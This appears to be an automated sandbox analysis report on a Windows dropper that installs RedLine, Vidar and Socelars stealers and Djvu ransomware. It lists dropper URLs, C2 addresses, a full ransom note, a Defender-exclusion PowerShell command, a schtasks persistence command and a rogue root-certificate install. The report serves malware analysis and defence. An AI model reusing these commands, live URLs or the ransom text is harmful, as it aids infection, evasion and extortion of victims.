djvu | 15f4e965344a38b07713363133e6624f72db10cb297967e91608eec1020e6b1d

Analysis

max time kernel
151s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
03-03-2022 20:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

15F4E965344A38B07713363133E6624F72DB10CB29796.exe
Size

4.0MB
MD5

0cc27690e2886c785a303112d1480b55
SHA1

f4723a92fb1c26fcd2f1cd9e8ce7b4a9c0e4f49b
SHA256

15f4e965344a38b07713363133e6624f72db10cb297967e91608eec1020e6b1d
SHA512

fbc41abd098997d9394e6f1692de5bac6add35215a03147c6d2a7956274c1cfafd42d364258cc147db074ae610c2a4d9491bad8f2a1f5fee86b50b7c945a334d

Score

10^/10

djvu redline socelars vidar 333333 706 fullwork1488 mix2 aspackv2 discovery infostealer ransomware spyware stealer upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://62.204.41.192/-LOD/LOD.exe

Extracted

Language

hta

Source

URLs

hta.dropper

http://62.204.41.192/-A/AutoRun.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/RED.oo

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://62.204.41.192/AMSI/ecco.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://62.204.41.192/AMSI/css.bat

Extracted

Family

vidar

Version

40.2

Botnet

706

https://kipriauka.tumblr.com/

Attributes

profile_id
706

Extracted

Family

redline

45.132.1.57:15771

Attributes

auth_value
9d006a439ab657f87bacd7a8c5f366b6

Extracted

Family

redline

Botnet

MIX2

45.132.1.57:15771

Attributes

auth_value
f5efeb0fa57eb56935fd3ba6d5750a9d

Extracted

Family

socelars

https://sa-us-bucket.s3.us-east-2.amazonaws.com/qwwgh/

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.qbaa
offline_id
rpx4UUTYZiAR5omq187UvM233jloVHyJUkA8s3t1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-G76puQlxBn Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: helprestoremanager@airmail.cc Your personal ID: 0412Jsfkjn

rsa_pubkey.plain

Extracted

Family

redline

Botnet

fullwork1488

91.243.32.165:41754

Attributes

auth_value
a4384deb7b09a3c1c21c6447924c2d9a

Extracted

Family

redline

Botnet

333333

31.210.20.42:13040

Attributes

auth_value
3efa022bc816f747304fd68e5810bb78

Signatures

Detected Djvu ransomware 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1440-281-0x0000000002470000-0x000000000258B000-memory.dmp	family_djvu
behavioral2/memory/1780-291-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7096 1904 rundll32.exe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7096	1904	rundll32.exe

RedLine Payload 17 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1376-249-0x00000000000A0000-0x000000000023E000-memory.dmp	family_redline
behavioral2/memory/1376-258-0x00000000000A0000-0x000000000023E000-memory.dmp	family_redline
behavioral2/memory/956-255-0x0000000000AA0000-0x0000000000C05000-memory.dmp	family_redline
behavioral2/memory/1376-250-0x00000000000A2000-0x00000000000BB000-memory.dmp	family_redline
behavioral2/memory/1376-273-0x00000000000A0000-0x000000000023E000-memory.dmp	family_redline
behavioral2/memory/3496-280-0x0000000000FE0000-0x000000000111A000-memory.dmp	family_redline
behavioral2/memory/860-288-0x00000000000A0000-0x00000000001DA000-memory.dmp	family_redline
behavioral2/memory/3496-284-0x0000000000FE0000-0x000000000111A000-memory.dmp	family_redline
behavioral2/memory/2588-277-0x00000000002F0000-0x000000000042A000-memory.dmp	family_redline
behavioral2/memory/3396-306-0x00000000004A0000-0x00000000005DA000-memory.dmp	family_redline
behavioral2/memory/3396-326-0x00000000004A0000-0x00000000005DA000-memory.dmp	family_redline
behavioral2/memory/860-275-0x00000000000A0000-0x00000000001DA000-memory.dmp	family_redline
behavioral2/memory/956-274-0x0000000000AA2000-0x0000000000ABB000-memory.dmp	family_redline
behavioral2/memory/5300-331-0x0000000000AB0000-0x0000000000C4E000-memory.dmp	family_redline
behavioral2/memory/5300-325-0x0000000000AB0000-0x0000000000C4E000-memory.dmp	family_redline
behavioral2/memory/2588-267-0x00000000002F0000-0x000000000042A000-memory.dmp	family_redline
behavioral2/memory/956-263-0x0000000000AA0000-0x0000000000C05000-memory.dmp	family_redline

Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\lIytXljGFF_m4mIuh3Y7LdHQ.exe	family_socelars
C:\Users\Admin\Pictures\Adobe Films\lIytXljGFF_m4mIuh3Y7LdHQ.exe	family_socelars

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

Processes:

WerFault.exeWerFault.exe

description pid process target process

PID 260 created 1308 260 WerFault.exe setup_install.exe
PID 1220 created 5012 1220 WerFault.exe Tue18f779a8ab63f6f0f.exe
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

description	pid	process	target process
PID 260 created 1308	260	WerFault.exe	setup_install.exe
PID 1220 created 5012	1220	WerFault.exe	Tue18f779a8ab63f6f0f.exe

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/5012-210-0x0000000000400000-0x00000000004D7000-memory.dmp	family_vidar
behavioral2/memory/5012-209-0x0000000000840000-0x0000000000913000-memory.dmp	family_vidar

ASPack v2.12-2.42 8 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC361863D\libzip.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC361863D\libzip.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\libstdc++-6.dll	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 14 IoCs

Processes:

setup.exesetup_install.exe10ef9331996d.exesetup_install.exeTue184d028e1c98311.exeTue183f28acfa3eb3.exeTue189a81be91752.exeTue18f779a8ab63f6f0f.exeTue185ad056d9dcafc86.exeTue1885a39914.exeTue18514cc6c2a3d5.exeTue18b92adfd1a5.exeTue18b92adfd1a5.tmpTue185ad056d9dcafc86.exe

pid	process
1596	setup.exe
1032	setup_install.exe
4592	10ef9331996d.exe
1308	setup_install.exe
4276	Tue184d028e1c98311.exe
4584	Tue183f28acfa3eb3.exe
4352	Tue189a81be91752.exe
5012	Tue18f779a8ab63f6f0f.exe
4152	Tue185ad056d9dcafc86.exe
3592	Tue1885a39914.exe
4960	Tue18514cc6c2a3d5.exe
4344	Tue18b92adfd1a5.exe
2620	Tue18b92adfd1a5.tmp
5000	Tue185ad056d9dcafc86.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\gAsVLVkcNFOLqk7T9GpJ3hZL.exe	upx

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

15F4E965344A38B07713363133E6624F72DB10CB29796.exesetup.exe10ef9331996d.exeTue185ad056d9dcafc86.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	15F4E965344A38B07713363133E6624F72DB10CB29796.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	setup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	10ef9331996d.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	Tue185ad056d9dcafc86.exe

Loads dropped DLL 10 IoCs

Processes:

setup_install.exesetup_install.exeTue18b92adfd1a5.tmp

pid	process
1032	setup_install.exe
1032	setup_install.exe
1032	setup_install.exe
1032	setup_install.exe
1308	setup_install.exe
1308	setup_install.exe
1308	setup_install.exe
1308	setup_install.exe
1308	setup_install.exe
2620	Tue18b92adfd1a5.tmp

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

4588 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

227 ipinfo.io
238 api.2ip.ua
271 ipinfo.io
90 ipinfo.io
89 ipinfo.io
236 api.2ip.ua
272 ipinfo.io
353 api.2ip.ua
13 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
4588	icacls.exe

flow	ioc
227	ipinfo.io
238	api.2ip.ua
271	ipinfo.io
90	ipinfo.io
89	ipinfo.io
236	api.2ip.ua
272	ipinfo.io
353	api.2ip.ua
13	ip-api.com

Program crash 37 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4528	1308	WerFault.exe	setup_install.exe
868	5012	WerFault.exe	Tue18f779a8ab63f6f0f.exe
5420	960	WerFault.exe
5324	620	WerFault.exe	15F4E965344A38B07713363133E6624F72DB10CB29796.exe
5824	2100	WerFault.exe
5816	2332	WerFault.exe
5480	480	WerFault.exe	ELhUNfu7LDZN33aoWekLIjGu.exe
5980	960	WerFault.exe
892	2100	WerFault.exe
3332	2332	WerFault.exe
3944	480	WerFault.exe	ELhUNfu7LDZN33aoWekLIjGu.exe
2332	1212	WerFault.exe	tEHnSE0z2TFtIkXIko4uva0M.exe
5644	480	WerFault.exe	ELhUNfu7LDZN33aoWekLIjGu.exe
3344	2808	WerFault.exe	QfDJGjhkfpybLMkQuDpMQHSQ.exe
5092	480	WerFault.exe	ELhUNfu7LDZN33aoWekLIjGu.exe
6136	4424	WerFault.exe	EFhSNuZlVZuKxDW7zVSsm5JZ.exe
944	2808	WerFault.exe	QfDJGjhkfpybLMkQuDpMQHSQ.exe
3400	480	WerFault.exe	ELhUNfu7LDZN33aoWekLIjGu.exe
1740	4424	WerFault.exe	EFhSNuZlVZuKxDW7zVSsm5JZ.exe
624	5784	WerFault.exe	BJZqAJbAY1ubMKc9XTUapDid.exe
4876	4424	WerFault.exe	EFhSNuZlVZuKxDW7zVSsm5JZ.exe
5876	480	WerFault.exe	ELhUNfu7LDZN33aoWekLIjGu.exe
6244	5016	WerFault.exe	38HrZ6XaF2YSOglin5mnxLV3.exe
6448	5784	WerFault.exe	BJZqAJbAY1ubMKc9XTUapDid.exe
6952	480	WerFault.exe	ELhUNfu7LDZN33aoWekLIjGu.exe
6808	4424	WerFault.exe	EFhSNuZlVZuKxDW7zVSsm5JZ.exe
6112	5784	WerFault.exe	BJZqAJbAY1ubMKc9XTUapDid.exe
6336	4424	WerFault.exe	EFhSNuZlVZuKxDW7zVSsm5JZ.exe
5440	4488	WerFault.exe	rundll32.exe
4360	4424	WerFault.exe	EFhSNuZlVZuKxDW7zVSsm5JZ.exe
4508	6000	WerFault.exe	anytime3.exe
6268	6500	WerFault.exe	anytime2.exe
6780	4936	WerFault.exe	anytime1.exe
6576	6192	WerFault.exe	LzmwAqmV.exe
6716	6372	WerFault.exe	bearvpn3.exe
1772	6192	WerFault.exe	LzmwAqmV.exe
3208	6192	WerFault.exe	LzmwAqmV.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4164 schtasks.exe
400 schtasks.exe
4796 schtasks.exe
6784 schtasks.exe
6952 schtasks.exe
6356 schtasks.exe
Delays execution with timeout.exe 3 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid process

2920 timeout.exe
4740 timeout.exe
2336 timeout.exe

pid	process
4164	schtasks.exe
400	schtasks.exe
4796	schtasks.exe
6784	schtasks.exe
6952	schtasks.exe
6356	schtasks.exe

pid	process
2920	timeout.exe
4740	timeout.exe
2336	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Kills process with taskkill 7 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4376 taskkill.exe
5876 taskkill.exe
3852 taskkill.exe
5508 taskkill.exe
364 taskkill.exe
3116 taskkill.exe
6184 taskkill.exe

pid	process
4376	taskkill.exe
5876	taskkill.exe
3852	taskkill.exe
5508	taskkill.exe
364	taskkill.exe
3116	taskkill.exe
6184	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Tue18f779a8ab63f6f0f.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Tue18f779a8ab63f6f0f.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Tue18f779a8ab63f6f0f.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exeWerFault.exeWerFault.exe

pid process

372 powershell.exe
372 powershell.exe
4528 WerFault.exe
4528 WerFault.exe
372 powershell.exe
868 WerFault.exe
868 WerFault.exe

pid	process
372	powershell.exe
372	powershell.exe
4528	WerFault.exe
4528	WerFault.exe
372	powershell.exe
868	WerFault.exe
868	WerFault.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

Tue184d028e1c98311.exeTue183f28acfa3eb3.exeWerFault.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4276	Tue184d028e1c98311.exe
Token: SeDebugPrivilege	4584	Tue183f28acfa3eb3.exe
Token: SeRestorePrivilege	4528	WerFault.exe
Token: SeBackupPrivilege	4528	WerFault.exe
Token: SeDebugPrivilege	372	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

15F4E965344A38B07713363133E6624F72DB10CB29796.exesetup.exesetup_install.execmd.exe10ef9331996d.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 620 wrote to memory of 1596	620	15F4E965344A38B07713363133E6624F72DB10CB29796.exe	setup.exe
PID 620 wrote to memory of 1596	620	15F4E965344A38B07713363133E6624F72DB10CB29796.exe	setup.exe
PID 620 wrote to memory of 1596	620	15F4E965344A38B07713363133E6624F72DB10CB29796.exe	setup.exe
PID 1596 wrote to memory of 1032	1596	setup.exe	setup_install.exe
PID 1596 wrote to memory of 1032	1596	setup.exe	setup_install.exe
PID 1596 wrote to memory of 1032	1596	setup.exe	setup_install.exe
PID 1032 wrote to memory of 4416	1032	setup_install.exe	cmd.exe
PID 1032 wrote to memory of 4416	1032	setup_install.exe	cmd.exe
PID 1032 wrote to memory of 4416	1032	setup_install.exe	cmd.exe
PID 4416 wrote to memory of 4592	4416	cmd.exe	10ef9331996d.exe
PID 4416 wrote to memory of 4592	4416	cmd.exe	10ef9331996d.exe
PID 4416 wrote to memory of 4592	4416	cmd.exe	10ef9331996d.exe
PID 4592 wrote to memory of 1308	4592	10ef9331996d.exe	setup_install.exe
PID 4592 wrote to memory of 1308	4592	10ef9331996d.exe	setup_install.exe
PID 4592 wrote to memory of 1308	4592	10ef9331996d.exe	setup_install.exe
PID 1308 wrote to memory of 1284	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 1284	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 1284	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 4780	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 4780	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 4780	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 2604	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 2604	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 2604	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 1040	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 1040	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 1040	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 388	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 388	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 388	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 3300	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 3300	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 3300	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 3436	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 3436	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 3436	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 1312	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 1312	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 1312	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 4948	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 4948	1308	setup_install.exe	cmd.exe
PID 1308 wrote to memory of 4948	1308	setup_install.exe	cmd.exe
PID 4948 wrote to memory of 4276	4948	cmd.exe	Tue184d028e1c98311.exe
PID 4948 wrote to memory of 4276	4948	cmd.exe	Tue184d028e1c98311.exe
PID 3300 wrote to memory of 4584	3300	cmd.exe	Tue183f28acfa3eb3.exe
PID 3300 wrote to memory of 4584	3300	cmd.exe	Tue183f28acfa3eb3.exe
PID 388 wrote to memory of 4352	388	cmd.exe	Tue189a81be91752.exe
PID 388 wrote to memory of 4352	388	cmd.exe	Tue189a81be91752.exe
PID 2604 wrote to memory of 5012	2604	cmd.exe	Tue18f779a8ab63f6f0f.exe
PID 2604 wrote to memory of 5012	2604	cmd.exe	Tue18f779a8ab63f6f0f.exe
PID 2604 wrote to memory of 5012	2604	cmd.exe	Tue18f779a8ab63f6f0f.exe
PID 4780 wrote to memory of 4152	4780	cmd.exe	Tue185ad056d9dcafc86.exe
PID 4780 wrote to memory of 4152	4780	cmd.exe	Tue185ad056d9dcafc86.exe
PID 4780 wrote to memory of 4152	4780	cmd.exe	Tue185ad056d9dcafc86.exe
PID 1312 wrote to memory of 3592	1312	cmd.exe	Tue1885a39914.exe
PID 1312 wrote to memory of 3592	1312	cmd.exe	Tue1885a39914.exe
PID 1312 wrote to memory of 3592	1312	cmd.exe	Tue1885a39914.exe
PID 1284 wrote to memory of 372	1284	cmd.exe	powershell.exe
PID 1284 wrote to memory of 372	1284	cmd.exe	powershell.exe
PID 1284 wrote to memory of 372	1284	cmd.exe	powershell.exe
PID 3436 wrote to memory of 4960	3436	cmd.exe	Tue18514cc6c2a3d5.exe
PID 3436 wrote to memory of 4960	3436	cmd.exe	Tue18514cc6c2a3d5.exe
PID 3436 wrote to memory of 4960	3436	cmd.exe	Tue18514cc6c2a3d5.exe
PID 1040 wrote to memory of 4344	1040	cmd.exe	Tue18b92adfd1a5.exe

C:\Users\Admin\AppData\Local\Temp\15F4E965344A38B07713363133E6624F72DB10CB29796.exe
"C:\Users\Admin\AppData\Local\Temp\15F4E965344A38B07713363133E6624F72DB10CB29796.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:620

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1596

C:\Users\Admin\AppData\Local\Temp\7zSC361863D\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC361863D\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\10ef9331996d.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4416

C:\Users\Admin\AppData\Local\Temp\10ef9331996d.exe
C:\Users\Admin\AppData\Local\Temp\10ef9331996d.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4592

C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\setup_install.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
7⤵
- Suspicious use of WriteProcessMemory
PID:1284

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:372

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue18514cc6c2a3d5.exe
7⤵
- Suspicious use of WriteProcessMemory
PID:3436

C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue18514cc6c2a3d5.exe
Tue18514cc6c2a3d5.exe
8⤵
- Executes dropped EXE
PID:4960

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue184d028e1c98311.exe
7⤵
- Suspicious use of WriteProcessMemory
PID:4948

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1885a39914.exe
7⤵
- Suspicious use of WriteProcessMemory
PID:1312

C:\Users\Admin\AppData\Local\Temp\7zS0F1C860D\Tue1885a39914.exe
Tue1885a39914.exe
8⤵
- Executes dropped EXE
PID:3592

C:\Users\Admin\Pictures\Adobe Films\HkebKzFRxkSNlblSnoUfJTAB.exe
"C:\Users\Admin\Pictures\Adobe Films\HkebKzFRxkSNlblSnoUfJTAB.exe"
9⤵
PID:3792

C:\Users\Admin\Pictures\Adobe Films\jrQvGLPJAIrrF7pKlkyY6Ek1.exe
"C:\Users\Admin\Pictures\Adobe Films\jrQvGLPJAIrrF7pKlkyY6Ek1.exe"
9⤵
PID:956

C:\Users\Admin\Pictures\Adobe Films\tyPJbaYRKPKjvADpc0wkPbBL.exe
"C:\Users\Admin\Pictures\Adobe Films\tyPJbaYRKPKjvADpc0wkPbBL.exe"
9⤵
PID:1580

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
10⤵
- Creates scheduled task(s)
PID:4164

